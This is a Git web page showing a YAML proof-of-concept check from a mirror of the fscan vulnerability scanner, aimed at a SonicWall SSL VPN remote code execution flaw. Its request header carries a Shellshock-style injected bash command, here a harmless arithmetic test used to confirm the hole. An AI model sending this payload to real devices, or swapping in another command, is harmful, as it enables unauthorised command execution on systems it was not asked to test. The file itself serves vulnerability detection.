qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/sonicwall-ssl-vpn-rce.yml

17 lines
485 B
YAML
Raw Normal View History

修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml
2021-02-25 03:53:58 -08:00
name: poc-yaml-sonicwall-ssl-vpn-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(1140000, 1144800)
rules:
- method: GET
path: /cgi-bin/jarrewrite.sh
follow_redirects: false
headers:
X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
detail:
author: sharecast
links:
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/